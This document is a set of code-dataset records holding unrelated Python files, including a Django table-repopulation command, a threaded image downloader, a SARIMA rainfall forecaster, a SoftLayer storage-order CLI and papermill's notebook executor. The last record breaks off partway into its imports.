data_portal_libraryrun_workflows\n (\n libraryrun_id,\n workflow_id\n )\nVALUES (%s, %s);\n\"\"\"\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser: CommandParser):\n parser.add_argument('table', help=\"defines which table to repopulate\")\n\n def handle(self, *args, **options):\n opt_table = options[\"table\"].lower()\n\n if opt_table == \"sequence\":\n logger.info(\"Sequence table selected\")\n\n with connection.cursor() as cursor:\n\n # Reset existing data\n logger.info(\"Truncate sequence table\")\n cursor.execute(TRUNCATE_SEQUENCE_TABLE_SQL)\n\n # Fetch latest data of instrument_run_id\n logger.info(\"Fetch latest data of instrument_run_id\")\n cursor.execute(QUERY_LATEST_INTRUMENT_RUN_ID_DATA_SQL)\n latest_data = cursor.fetchall()\n\n logger.info(\"Iterate each latest data\")\n for row in latest_data:\n # Destructuring varibles for each row\n end_time, flowcell_barcode, gds_folder_path, \\\n gds_volume_name, instrument_run_id, reagent_barcode, \\\n run_id, sample_sheet_name, status = row\n\n # Fetch start_time of sequence\n cursor.execute(QUERY_INITIAL_INTRUMENT_RUN_ID_DATE_SQL,\n [instrument_run_id])\n start_time = cursor.fetchone()[0]\n\n # Check if sequence has ended and end_time is eligibled to be recorded\n status = SequenceStatus.from_seq_run_status(status)\n if status not in [SequenceStatus.SUCCEEDED, SequenceStatus.FAILED]:\n logger.info(f\"Sequence {instrument_run_id} not finish setting end_time to None\")\n end_time = None\n\n logger.info(f\"Insert sequence {instrument_run_id} to sequence table from data fetched\")\n cursor.execute(INSERT_SEQUENCE_TABLE_SQL, [instrument_run_id,\n run_id, sample_sheet_name, gds_folder_path,\n gds_volume_name, reagent_barcode, flowcell_barcode,\n status, start_time, end_time])\n\n logger.info(\"Repopulate sequence table complete\")\n\n elif opt_table == \"libraryrun\":\n logger.info(\"LibraryRun table selected\")\n\n # Default value\n coverage_yield = None\n qc_pass = False\n qc_status = None\n valid_for_analysis = True\n\n with connection.cursor() as cursor:\n\n # Associated constrain must be drop before reset libraryrun\n logger.info(\"Drop data_portal_libraryrun_workflows table\")\n cursor.execute(DROP_LIBRARYRUN_WORKFLOW_TABLE_SQL)\n\n # Reset libraryrun \n logger.info(\"Drop data_portal_libraryrun_workflows table\")\n cursor.execute(TRUNCATE_LIBRARYRUN_TABLE_SQL)\n\n # Establish new libraryrun constrain\n logger.info(\"Create a brand new libraryrun_workflow table\")\n cursor.execute(CREATE_LIBRARYRUN_WORKFLOW_TABLE_SQL)\n\n # Fetch List of intrument_run_id and run_id from sequence\n logger.info(\"Fetch sequence run\")\n cursor.execute(QUERY_SEQUENCE_TABLE_SQL)\n sequence_list = cursor.fetchall()\n\n for instrument_run_id, run_id in sequence_list:\n # Grab RGLB and lane from fastqlist\n cursor.execute(QUERY_RGLB_LANE_FROM_FASTQLIST_SQL, [instrument_run_id, run_id])\n fastq_list = cursor.fetchall()\n\n for library_id, lane in fastq_list:\n\n # Find overide_cycles from metadata\n cursor.execute(QUERY_OVERRIDE_CYCLES_SQL, [library_id])\n override_cycles = cursor.fetchone()[0]\n\n # Insert libraryrun entries to the table\n logger.info(f\"Inserting {instrument_run_id}, {run_id}, {library_id}, {lane} entries to \"\n f\"data_portal_libraryrun table.\")\n cursor.execute(INSERT_LIBRARYRUN_VALUE_SQL, [library_id, instrument_run_id, run_id, lane,\n override_cycles, coverage_yield, qc_pass, qc_status,\n valid_for_analysis])\n inserted_libraryrun_id = cursor.fetchone()[0]\n\n # Extract associated workflow with libraryid\n cursor.execute(QUERY_WORKFLOW_FROM_LIBRARY_ID_SQL, [f\"%{library_id}%\", f\"%{library_id}%\"])\n workflow_id_list = cursor.fetchall()\n\n # Insert associated workflow to data_portal_libraryrun_workflow\n for workflow_id in workflow_id_list:\n cursor.execute(INSERT_LIBRARYRUN_WORKFLOW_TABLE_SQL, [inserted_libraryrun_id, workflow_id])\n\n logger.info(\"LibraryRun successfully repopulated.\")\n","sub_path":"data_portal/management/commands/repopulatetable.py","file_name":"repopulatetable.py","file_ext":"py","file_size_in_byte":9515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"578556169","text":"\r\n# Asynchroniczne pobranie danych ze strony WWW\r\nimport requests\r\nfrom multiprocessing.pool import ThreadPool\r\n\r\nBASE_URL = \"http://51.91.120.89/TABLICE/\"\r\n\r\nresponse = requests.get(BASE_URL)\r\nlines = response.text.split(\"\\n\")\r\nurls = [f\"{BASE_URL}{l.strip()}\" for l in lines if len(l.strip())>0 ]\r\nprint(urls)\r\n\r\ndef download_url(url):\r\n #print(f\"Start {url}\")\r\n r = requests.get(url)\r\n file_name = url.split(\"/\")[-1]\r\n with open(file_name, \"wb\") as fd:\r\n fd.write(r.content)\r\n #print(f\"Stop {url}\")\r\n return file_name\r\n\r\n#download_url(\"http://51.91.120.89/TABLICE/NO9738R.jpg\")\r\nresult = ThreadPool(20).imap_unordered( download_url, urls )\r\nfor r in result:\r\n print(r)\r\n\r\n\r\n","sub_path":"Dzien02/09-multiprocessing.py","file_name":"09-multiprocessing.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472701268","text":"SPACE = ' '\nLINE_BREAK = '\\n'\n\nfile = open('A-large-practice.in')\nlines = list(file)\n\nCASE_COUNT = int(lines.pop(0))\nCASE_LINE_COUNT = 3\nCASE_LINE_TOTAL_COUNT = CASE_COUNT * CASE_LINE_COUNT\n\nfor i, line in enumerate(lines):\n\tlines[i] = line.strip(LINE_BREAK)\n\t\t\noutput_file = open('A-large-practice.out', 'w')\n\ncount = 0\ni = 0\n\nwhile count < CASE_LINE_TOTAL_COUNT:\n output = 'Case #' + str(i + 1) + ': '\n case_set = range(count, count + CASE_LINE_COUNT)\n c = lines[case_set[0]]\n p = lines[case_set[2]]\n l = list(p.split(SPACE))\n d = {}\n for k, v in enumerate(l):\n d[v] = k\n dd = {}\n for k, v in enumerate(reversed(l)):\n dd[v] = len(l) - k - 1\n\n e = enumerate(l)\n\n for k, v in e:\n m = str(int(c) - int(v))\n try:\n line_break = LINE_BREAK\n\n kk = k + 1\n s = int(d[m]) + 1\n\n if kk == s:\n # check if the current dict match the reverse, if so raise because it is the same number used twice\n if d[m] == dd[m]:\n raise\n else:\n s = int(dd[m]) + 1\n\n output += str(kk) + SPACE + str(s)\n\n if (i + 1) == CASE_COUNT:\n line_break = ''\n\n output_file.write(output + line_break)\n\n break\n except:\n pass\n\n count = count + CASE_LINE_COUNT\n i += 1\n\t\n#while count < CASE_LINE_TOTAL_COUNT:\n#\toutput = 'Case #' + str(i + 1) + ': '\n#\tcase_set = range(count, count + CASE_LINE_COUNT)\n#\tc = lines[case_set[0]]\n#\tp = lines[case_set[2]]\n#\tb = False\n#\te = enumerate(list(p.split(SPACE)))\n#\td = {v: k for k, v in e}\n#\te = enumerate(list(p.split(SPACE)))\n\t\n#\tfor k, v in e:\n#\t\tm = str(int(c) - int(v))\n#\t\ttry:\n#\t\t\tline_break = LINE_BREAK\n#\t\t\toutput += str(k + 1) + SPACE + str(int(d[m]) + 1)\n\t\t\t\n#\t\t\tif (i + 1) == CASE_COUNT:\n#\t\t\t\tline_break = ''\n\n#\t\t\toutput_file.write(output + line_break)\n\t\t\t\n#\t\t\tbreak\n#\t\texcept:\n#\t\t\tpass\n\t\t\t\n#\tcount = count + CASE_LINE_COUNT\n#\ti += 1\n\t\n#while count < CASE_LINE_TOTAL_COUNT:\n#\toutput = 'Case #' + str(i + 1) + ': '\n#\tcase_set = range(count, count + CASE_LINE_COUNT)\n\t\n#\tc = lines[case_set[0]]\n#\tp = lines[case_set[2]].split(SPACE)\n#\tb = False\n\t\n#\tfor k, v in enumerate(p):\n#\t\tfor kk, vv in enumerate(p):\n#\t\t\tif not int(k) == int(kk) and (int(v) + int(vv) == int(c)):\n#\t\t\t\tline_break = LINE_BREAK\n#\t\t\t\toutput += str(k + 1) + SPACE + str(kk + 1)\n#\t\t\t\t\n#\t\t\t\tif (i + 1) == CASE_COUNT:\n#\t\t\t\t\tline_break = ''\n\n#\t\t\t\toutput_file.write(output + line_break)\n\t\t\t\t\n#\t\t\t\tb = True\n#\t\t\t\tbreak\n#\t\tif b:\n#\t\t\tbreak\n\t\t\t\n#\tcount = count + CASE_LINE_COUNT\n#\ti += 1","sub_path":"practice/a/store_credit.py","file_name":"store_credit.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223621241","text":"#!/usr/bin/python\n\nimport sys\nimport argparse\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\n\nimport wave\nimport librosa\nfrom dtw import dtw\nfrom numpy.linalg import norm\n\ndef list_files(directory):\n onlyfiles = [f for f in listdir(directory) if isfile(join(directory, f)) and re.match(r'.*\\.wav$',f)]\n return map(lambda f: join(directory, f), onlyfiles)\n\ndef extract_features(path):\n y, sr = librosa.load(path)\n mfcc = librosa.feature.mfcc(y,sr) #Computing MFCC values\n return [path, mfcc]\n\nparser=argparse.ArgumentParser(description='Create a collage based on a given file using given snippets.')\nparser.add_argument(\n '-s', '--sampledir', type=str, required=True, help='Path of chopped source sounds directory.')\nparser.add_argument(\n '-c', '--chopdir', type=str, required=True, help='Path of snippets directory.')\nparser.add_argument(\n '-o', '--outfile', type=str, required=False, default='./collage.wav', help='Path of output file.')\n\nargs = parser.parse_args()\n\nsample_dir = args.sampledir\nchop_dir = args.chopdir\noutfile = args.outfile\n\ntmp_dir = './tmp'\n\nsample_files = list_files(sample_dir)\nsnippet_files = list(list_files(chop_dir))\nsnippet_files.sort()\n\nsample_files = [extract_features(path) for path in sample_files]\n\nselected_snippets = []\n\nfor snippet_path in snippet_files:\n y1, sr1 = librosa.load(snippet_path)\n mfcc = librosa.feature.mfcc(y1,sr1) #Computing MFCC values\n\n min_dist = 999999999\n closest_sample = None\n for sample_path, sample_mfcc in sample_files:\n dist, cost, acc_cost, path = dtw(mfcc.T, sample_mfcc.T, dist=lambda x, y: norm(x - y, ord=1))\n if dist < min_dist:\n min_dist = dist\n closest_sample = sample_path\n\n selected_snippets.append(closest_sample)\n\nwith wave.open(outfile, 'wb') as wav_out:\n for wav_path in selected_snippets:\n with wave.open(wav_path, 'rb') as wav_in:\n if not wav_out.getnframes():\n wav_out.setparams(wav_in.getparams())\n wav_out.writeframes(wav_in.readframes(wav_in.getnframes()))\n","sub_path":"collage.py","file_name":"collage.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258789153","text":"\"\"\"Order a file storage volume.\"\"\"\n# :license: MIT, see LICENSE for more details.\n\nimport click\nimport SoftLayer\nfrom SoftLayer.CLI import environment\nfrom SoftLayer.CLI import exceptions\n\n\nCONTEXT_SETTINGS = {'token_normalize_func': lambda x: x.upper()}\n\n\n@click.command(context_settings=CONTEXT_SETTINGS)\n@click.option('--storage-type',\n help='Type of file storage volume',\n type=click.Choice(['performance', 'endurance']),\n required=True)\n@click.option('--size',\n type=int,\n help='Size of file storage volume in GB',\n required=True)\n@click.option('--iops',\n type=int,\n help='Performance Storage IOPs,'\n ' between 100 and 6000 in multiples of 100'\n ' [required for storage-type performance]')\n@click.option('--tier',\n help='Endurance Storage Tier (IOP per GB)'\n ' [required for storage-type endurance]',\n type=click.Choice(['0.25', '2', '4', '10']))\n@click.option('--location',\n help='Datacenter short name (e.g.: dal09)',\n required=True)\n@click.option('--snapshot-size',\n type=int,\n help='Optional parameter for ordering snapshot '\n 'space along with endurance file storage; specifies '\n 'the size (in GB) of snapshot space to order')\n@click.option('--service-offering',\n help='The service offering package to use for placing '\n 'the order [optional, default is \\'storage_as_a_service\\']',\n default='storage_as_a_service',\n type=click.Choice([\n 'storage_as_a_service',\n 'enterprise',\n 'performance']))\n@click.option('--billing',\n type=click.Choice(['hourly', 'monthly']),\n default='monthly',\n help=\"Optional parameter for Billing rate (default to monthly)\")\n@environment.pass_env\ndef cli(env, storage_type, size, iops, tier,\n location, snapshot_size, service_offering, billing):\n \"\"\"Order a file storage volume.\"\"\"\n file_manager = SoftLayer.FileStorageManager(env.client)\n storage_type = storage_type.lower()\n\n hourly_billing_flag = False\n if billing.lower() == \"hourly\":\n hourly_billing_flag = True\n\n if hourly_billing_flag and service_offering != 'storage_as_a_service':\n raise exceptions.CLIAbort(\n 'Hourly billing is only available for the storage_as_a_service '\n 'service offering'\n )\n\n if storage_type == 'performance':\n if iops is None:\n raise exceptions.CLIAbort(\n 'Option --iops required with Performance')\n\n if iops % 100 != 0:\n raise exceptions.CLIAbort(\n 'Option --iops must be a multiple of 100'\n )\n\n if service_offering == 'performance' and snapshot_size is not None:\n raise exceptions.CLIAbort(\n '--snapshot-size is not available for performance volumes '\n 'ordered with the \\'performance\\' service offering option'\n )\n\n try:\n order = file_manager.order_file_volume(\n storage_type=storage_type,\n location=location,\n size=size,\n iops=iops,\n snapshot_size=snapshot_size,\n service_offering=service_offering,\n hourly_billing_flag=hourly_billing_flag\n )\n except ValueError as ex:\n raise exceptions.ArgumentError(str(ex))\n\n if storage_type == 'endurance':\n if tier is None:\n raise exceptions.CLIAbort(\n 'Option --tier required with Endurance in IOPS/GB '\n '[0.25,2,4,10]'\n )\n\n try:\n order = file_manager.order_file_volume(\n storage_type=storage_type,\n location=location,\n size=size,\n tier_level=float(tier),\n snapshot_size=snapshot_size,\n service_offering=service_offering,\n hourly_billing_flag=hourly_billing_flag\n )\n except ValueError as ex:\n raise exceptions.ArgumentError(str(ex))\n\n if 'placedOrder' in order.keys():\n click.echo(\"Order #{0} placed successfully!\".format(\n order['placedOrder']['id']))\n for item in order['placedOrder']['items']:\n click.echo(\" > %s\" % item['description'])\n else:\n click.echo(\"Order could not be placed! Please verify your options \" +\n \"and try again.\")\n","sub_path":"SoftLayer/CLI/file/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"163594539","text":"# scipy\nimport scipy\nprint('scipy: %s' % scipy.__version__)\n\n# numpy\nimport numpy as np\nprint('numpy: %s' % np.__version__)\n\n# pandas\nimport pandas as pd\nprint('pandas: %s' % pd.__version__)\n\n# scikit-learn\nimport sklearn\nprint('sklearn: %s' % sklearn.__version__)\n\n# statsmodels\nimport statsmodels\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport statsmodels.tsa.api as smt\nprint('statsmodels: %s' % statsmodels.__version__)\n\n# json\nfrom bson import json_util, ObjectId\nfrom bson.json_util import dumps\nfrom pandas.io.json import json_normalize\nimport json\n\nimport itertools\nimport warnings\nimport datetime\n\nfrom flask import jsonify\n\n# Importa o banco de dados\nfrom app import db, db2\n\ndef PredictSARIMARainfall(stationId):\n\n # Get station Infos\n station_info = list(db.meteo_data_weather_stations.find({'_id':ObjectId(stationId)}))\n\n print('\\n')\n print('*************************************************************')\n print('**************** AgroAnalytics BRAINS API *******************')\n print('*************************************************************')\n print('\\n')\n print('------------------------ SARIMA -----------------------------')\n print('\\n')\n print('Preparando dados da cidade de '+ station_info[0]['unparsed_city'] +'....')\n print('\\n')\n\n # Busca dataset no banco de dados\n weather = list(db.meteo_data_weather_data.find({'weather_station_id': ObjectId(stationId)}))\n weather_normalized = pd.io.json.json_normalize(weather)\n df_rainfall = pd.DataFrame(weather_normalized[['analysis_date', 'rainfall.rainfall']])\n df_rainfall = df_rainfall.set_index('analysis_date')\n ts_rainfall = df_rainfall['2000-03-01':'2017-08-11'].groupby(pd.TimeGrouper(freq='MS')).mean()\n\n # Cria amostra de treinamento e de teste antes de realizar a análise\n n_sample = ts_rainfall.shape[0]\n n_forecast=12\n n_train=n_sample-n_forecast\n ts_train = ts_rainfall.iloc[:n_train]['rainfall.rainfall']\n ts_test = ts_rainfall.iloc[n_train:]['rainfall.rainfall']\n print(ts_train.shape)\n print(ts_test.shape)\n print(\"Training Series:\", \"\\n\", ts_train.tail(), \"\\n\")\n print(\"Testing Series:\", \"\\n\", ts_test.head())\n\n print('----------------- Iniciando Treinamento ---------------------')\n print('\\n')\n # Treina e define o modelo\n p=0\n d=0\n q=4\n P=3\n D=0\n Q=4\n s=12\n arima202 = sm.tsa.SARIMAX(ts_train, order=(p,d,q), seasonal_order=(P,D,Q,s), enforce_stationarity=False, enforce_invertibility=False)\n model_results = arima202.fit()\n\n # Realiza previsões\n pred_begin = ts_train.index[model_results.loglikelihood_burn]\n pred_end = ts_test.index[-1] + datetime.timedelta(days=365)\n pred = model_results.get_prediction(start=pred_begin.strftime('2013-01-%d'),\n end=pred_end.strftime('%Y-%m-%d'))\n pred_mean = pred.predicted_mean\n pred_ci = pred.conf_int(alpha=0.05)\n\n # Prepara listas com dados\n \n pred = pred_mean.values\n pred_list = pred.tolist()\n\n data = ts_rainfall['rainfall.rainfall'].values\n data_list = data.tolist()\n\n index = pred_mean.index\n index_list = index.tolist()\n\n data_train = data_list\n data_test = [None] * len(data_list)\n\n for i in range(1,13):\n data_test[-i]=data_list[-i]\n data_train[-i]=None\n\n data_train[-12]=data_test[-12]\n\n for i in range(12):\n data_train.append(None)\n data_test.append(None)\n\n # Prepara métricas do modelo\n\n def get_rmse(y, y_hat):\n mse = np.mean((y - y_hat)**2)\n return np.sqrt(mse)\n\n\n # Prepara dicionário a serem persistido\n dict_data = {}\n dict_data['data']=data_list\n dict_data['data_test']=data_test\n dict_data['data_train']=data_train\n dict_data['data_pred']=pred_list\n dict_data['index']=index_list\n dict_data['city']=station_info[0]['unparsed_city']\n dict_data['model']='SARIMA'\n dict_data['type']='Precipitação'\n tempoFinalização=datetime.datetime.now()\n dict_data['date']=tempoFinalização\n dict_data['pdq']= str(p)+', '+str(d)+', '+str(q)\n dict_data['PDQs']= str(P)+', '+str(D)+', '+str(Q)+', '+str(s)\n dict_data['rmse_train']=get_rmse(ts_train, pred_mean.ix[ts_train.index])\n dict_data['rmse_test']=get_rmse(ts_test, pred_mean.ix[ts_test.index])\n dict_data['AIC']=model_results.aic\n dict_data['BIC']=model_results.bic\n \n\n # Persiste dicionário\n _id = db2.SARIMA_predictions.insert(dict_data)\n \n message=\"Finalizado em \" + tempoFinalização.strftime(\"%Y/%m/%d às %H:%M:%S\") + \". (ID: \" + str(_id) + \")\"\n\n del dict_data['date']\n del dict_data['_id']\n\n \n print(message)\n print('\\n')\n print('----------------------- Sucesso! ----------------------------')\n print('\\n')\n\n return jsonify({'message':message,'result':dict_data})","sub_path":"machine_learning/RainfallSARIMA.py","file_name":"RainfallSARIMA.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246933516","text":"import os\nimport time\n\nimport nbformat\nfrom jupyter_client.kernelspec import get_kernel_spec\nfrom nbconvert.preprocessors import ExecutePreprocessor\nfrom nbconvert.preprocessors.execute import CellExecutionError\n\nfrom papermill.conf import settings\nfrom papermill.exceptions import PapermillException\nfrom papermill.iorw import load_notebook_node, write_ipynb, read_yaml_file\n\nfrom six import string_types\n\n\nclass PapermillExecutePreprocessor(ExecutePreprocessor):\n\n def preprocess(self, nb, resources):\n \"\"\"\n The default preprocess behavior if allow_errors = True is to continue executing all the cells.\n We want the notebook to cease execution and then write out the state of the notebook with the traceback\n on the cell that failed.\n \"\"\"\n # Clear out all outputs prior to execution.\n for cell in nb.cells:\n cell.outputs = []\n\n # Catch CellExecutionError if thrown which lets this method finish so we can write the state of the notebook\n # to disk.\n try:\n nb, resources = super(PapermillExecutePreprocessor, self).preprocess(nb, resources)\n except CellExecutionError:\n pass\n\n return nb, resources\n\n\ndef execute_notebook(notebook, output, parameters=None, kernel_name=None):\n \"\"\"Executes a single notebook locally.\n\n Args:\n notebook (str): Path to input notebook.\n output (str): Path to save exexuted notebook.\n parameters (dict): Arbitrary keyword arguments to pass to the notebook parameters.\n kernel_name (str): Name of kernel to execute the notebook against.\n\n \"\"\"\n nb = load_notebook_node(notebook)\n\n # Parameterize the Notebook.\n if parameters:\n _parameterize_notebook(nb, kernel_name, parameters)\n\n # Execute the Notebook.\n t0 = time.time()\n processor = PapermillExecutePreprocessor(\n timeout=None,\n kernel_name=kernel_name or nb.metadata.kernelspec.name,\n )\n processor.preprocess(nb, {})\n duration = time.time() - t0\n\n # Record specified environment variable values.\n nb.metadata.papermill['parameters'] = parameters\n nb.metadata.papermill['environment_variables'] = _fetch_environment_variables()\n nb.metadata.papermill['metrics']['duration'] = duration\n\n # Write Notebook to disk.\n write_ipynb(nb, output)\n\n\ndef _parameterize_notebook(nb, kernel_name, parameters):\n\n # Load from a file if 'parameters' is a string.\n if isinstance(parameters, string_types):\n parameters = read_yaml_file(parameters)\n\n # Generate parameter content based on the kernal_name\n kernel_name = kernel_name or nb.metadata.kernelspec.name\n param_content = _build_parameter_code(kernel_name, parameters)\n\n # Remove the old cell and replace it with a new one containing parameter content.\n param_cell_index = _find_parameters_index(nb)\n old_parameters = nb.cells[param_cell_index]\n before = nb.cells[:param_cell_index]\n after = nb.cells[param_cell_index + 1:]\n newcell = nbformat.v4.new_code_cell(source=param_content)\n newcell.metadata['tags'] = old_parameters.metadata.tags\n nb.cells = before + [newcell] + after\n\n\ndef _build_parameter_code(kernel_name, parameters):\n kernelspec = get_kernel_spec(kernel_name)\n if kernel_name in _parameter_code_builders:\n return _parameter_code_builders[kernel_name](parameters)\n elif kernelspec.language in _parameter_code_builders:\n return _parameter_code_builders[kernelspec.language](parameters)\n raise PapermillException(\n \"No parameter builder functions specified for kernel '%s' or language '%s'\" % (kernel_name, kernelspec.language)\n )\n\n\ndef _find_parameters_index(nb):\n parameters_indices = []\n for idx, cell in enumerate(nb.cells):\n if \"parameters\" in cell.metadata.tags:\n parameters_indices.append(idx)\n if not parameters_indices:\n raise PapermillException(\"No parameters tag found\")\n elif len(parameters_indices) > 1:\n raise PapermillException(\"Multiple parameters tags found\")\n return parameters_indices[0]\n\n\n# Registry for functions that build parameter assignment code.\n_parameter_code_builders = {}\n\n\ndef register_param_builder(name):\n \"\"\"Decorator for registering functions that write variable assignments for a given kernel or language.\"\"\"\n def wrapper(func):\n _parameter_code_builders[name] = func\n return func\n return wrapper\n\n\n@register_param_builder(\"python\")\ndef build_python_params(parameters):\n \"\"\"Writers parameter assignment code for Python kernels.\"\"\"\n param_content = \"# Parameters\\n\"\n for var, val in parameters.items():\n if isinstance(val, string_types):\n val = '\"%s\"' % val # TODO: Handle correctly escaping input strings.\n param_content += '%s = %s\\n' % (var, val)\n return param_content\n\n\n@register_param_builder(\"R\")\ndef build_r_params(parameters):\n \"\"\"Writes parameters assignment code for R kernels.\"\"\"\n param_content = \"# Parameters\\n\"\n for var, val in parameters.items():\n if isinstance(val, string_types):\n val = '\"%s\"' % val # TODO: Handle correctly escaping input strings.\n elif val is True:\n val = 'TRUE'\n elif val is False:\n val = 'FALSE'\n param_content += '%s = %s\\n' % (var, val)\n return param_content\n\n\ndef _fetch_environment_variables():\n ret = dict()\n for name, value in os.environ.items():\n if name in settings.ENVIRONMENT_VARIABLES:\n ret[name] = value\n return ret\n","sub_path":"papermill/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"28575960","text":"from datetime import date\nfrom django.db import models\n\n\nclass Certificate(models.Model):\n month = ('Январь', 'Февраль', 'Март', 'Апрель', 'Май', 'Июнь', 'Июль',\n 'Август', 'Сентябрь', 'Октябрь', 'Ноябрь', 'Декабрь')\n MONTHS = tuple(enumerate(month, start=1))\n\n\n\n employee = models.ForeignKey(\n 'authentication.Employee',\n verbose_name='Сотрудник',\n on_delete=models.CASCADE\n )\n serial_number = models.CharField('№ квалификационного удостоверения',\n max_length=20\n )\n received_at_year = models.PositiveSmallIntegerField('Дата выдачи (год)')\n received_at_month = models.PositiveSmallIntegerField('Дата выдачи (месяц)',\n choices=MONTHS\n )\n received_at_day = models.PositiveSmallIntegerField('Дата выдачи (день)', null=True, blank=True)\n\n expired_at_year = models.PositiveSmallIntegerField('Срок действия (год)')\n expired_at_month = models.PositiveSmallIntegerField('Срок действия (месяц)',\n choices=MONTHS\n )\n expired_at_day = models.PositiveSmallIntegerField('Срок действия (день)', null=True, blank=True)\n\n control_types = models.ManyToManyField('ControlType', verbose_name='Вид контроля')\n degree = models.PositiveSmallIntegerField('Уровень',\n blank=True, null=True\n )\n\n class Meta:\n verbose_name = 'Удостоверение'\n verbose_name_plural = 'Удостоверения'\n\n def __str__(self):\n return 'Удостоверение № {} ({})'.format(self.serial_number, self.employee.fio())\n\n def details(self):\n received = '{:0>2}.{}'.format(self.received_at_month, self.received_at_year)\n expired = '{:0>2}.{}'.format(self.expired_at_month, self.expired_at_year)\n types = tuple(map(lambda x: str(x), self.control_types.all()))\n types_num = len(types)\n return (\n (self.serial_number, ) * types_num,\n (received, ) * types_num,\n (expired, ) * types_num,\n types,\n )\n\n def verbose_info(self):\n if self.control_types.filter(name='ПБ Ростехнадзора'):\n title = self.control_types.first().full_name\n else:\n level = ' {}-го уровня квалификации'.format(self.degree) if self.degree else ''\n control_types = ', '.join(tuple(map(lambda x: str(x), self.control_types.all())))\n title = 'Специалист{} по {}'.format(level, control_types)\n\n return [\n title,\n self.serial_number,\n '{:0>2}.{} г.'.format(self.expired_at_month, self.expired_at_year)\n ]\n\n def verbose_info2(self, control_type):\n level = {\n 1: 'I',\n 2: 'II',\n 3: 'III',\n 4: 'IV',\n 5: 'V'\n }\n info = ['Исполнитель,']\n if not self.degree:\n info.append('специалист {},'.format(self.control_types.get(name=control_type)))\n else:\n info.append('специалист {} {} уровень,'.format(\n self.control_types.get(name=control_type),\n level.get(self.degree)))\n info.append('удостоверение № ' + self.serial_number)\n info.append('действительно до {:0>2}.{} г.'.format(\n self.expired_at_month,\n self.expired_at_year))\n return '
'.join(info)\n\n # TODO: разумнее перенести этот код в генератор отчётов\n def verbose_info3(self, control_type):\n info = ['Контроль выполнил:']\n second_line = ''\n level = {\n 1: 'I',\n 2: 'II',\n 3: 'III',\n 4: 'IV',\n 5: 'V'\n }\n if not self.degree:\n info.append('Специалист по {}:'.format(self.control_types.get(name=control_type)))\n else:\n info.append('Специалист {} уровня по {}'.format(\n level.get(self.degree), self.control_types.get(name=control_type)\n ))\n if self.received_at_day:\n info.append('уд. №{} от {:0>2}.{:0>2}.{} г.'.format(self.serial_number, self.received_at_day, self.received_at_month, self.received_at_year))\n else:\n info.append(\n 'уд. №{} от {:0>2}.{} г.'.format(self.serial_number, self.received_at_month, self.received_at_year))\n return '
'.join(info)\n\n\n def info(self):\n received = '{:0>2}.{}'.format(self.received_at_month, self.received_at_year)\n expired = '{:0>2}.{}'.format(self.expired_at_month, self.expired_at_year)\n return {\n 'fio': self.employee.fio(),\n 'serial_number': self.serial_number,\n 'received': received,\n 'expired': expired,\n }\n\n def plain_details(self, delim=' '):\n return [delim.join(x) for x in self.details()] + [str(self.degree)]\n\n def get(self, name):\n return (\n self.serial_number,\n '{:0>2}.{}'.format(self.received_at_month, self.received_at_year),\n '{:0>2}.{}'.format(self.expired_at_month, self.expired_at_year),\n str(self.control_types.get(name=name)),\n self.degree,\n )\n\nclass ControlType(models.Model):\n name = models.CharField('Краткое обозначение вида контроля', max_length=30)\n full_name = models.CharField('Полное наименование вида контроля',\n max_length=200,\n blank=True, null=True\n )\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Вид контроля'\n verbose_name_plural = 'Виды контроля'\n\nclass EBcertificate(models.Model):\n EB_GROUPS = (\n (1, 'I'),\n (2, 'II'),\n (3, 'III'),\n (4, 'IV'),\n (5, 'V'),\n )\n employee = models.OneToOneField(\n 'authentication.Employee',\n verbose_name='Сотрудник',\n on_delete=models.CASCADE\n )\n serial_number = models.CharField('№ удостоверения по ЭБ',\n max_length=20\n )\n received_at = models.DateField('Дата выдачи')\n expired_at = models.DateField('Срок действия')\n group = models.PositiveSmallIntegerField('Группа ЭБ', choices=EB_GROUPS)\n\n class Meta:\n verbose_name = 'Удостоверение по ЭБ'\n verbose_name_plural = 'Удостоверения по ЭБ'\n\n def __str__(self):\n return 'Удостоверение по ЭБ № {} ({})'.format(self.serial_number, self.employee.fio())\n\n def info(self):\n return {\n 'fio': self.employee.fio(),\n 'serial_number': self.serial_number,\n 'received': self.received_at.strftime('%d.%m.%Y'),\n 'expired': self.expired_at.strftime('%d.%m.%Y'),\n }\n\nclass SIZcertificate(models.Model):\n name = models.CharField('Продукция', max_length=50)\n clothes = models.FileField('Сертификат соответствия', blank=True, null=True, upload_to='uploads/')\n clothes_period_of_validity = models.DateField('Срок действия', blank=True, null=True)\n\n class Meta:\n verbose_name = 'Сертификат СИЗ'\n verbose_name_plural = 'Сертификаты СИЗ'\n\n def __str__(self):\n return self.name\n\nclass ExtraCertificate(models.Model):\n name = models.CharField('Название', max_length=50)\n extra_certificate = models.FileField('Сертификат', blank=True, null=True, upload_to='uploads/')\n extra_period_of_validity = models.DateField('Срок действия', blank=True, null=True)\n\n class Meta:\n verbose_name = 'Дополнительный сертификат'\n verbose_name_plural = 'Дополнительные сертификаты'\n\n def __str__(self):\n return self.name\n","sub_path":"gmp/apps/certificate/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24803354","text":"#\n#Copyright Odin Solutions S.L. All Rights Reserved.\n#\n#SPDX-License-Identifier: Apache-2.0\n#\n\nimport http.client\n\nimport configparser\nimport json\nfrom subprocess import Popen, PIPE\nimport 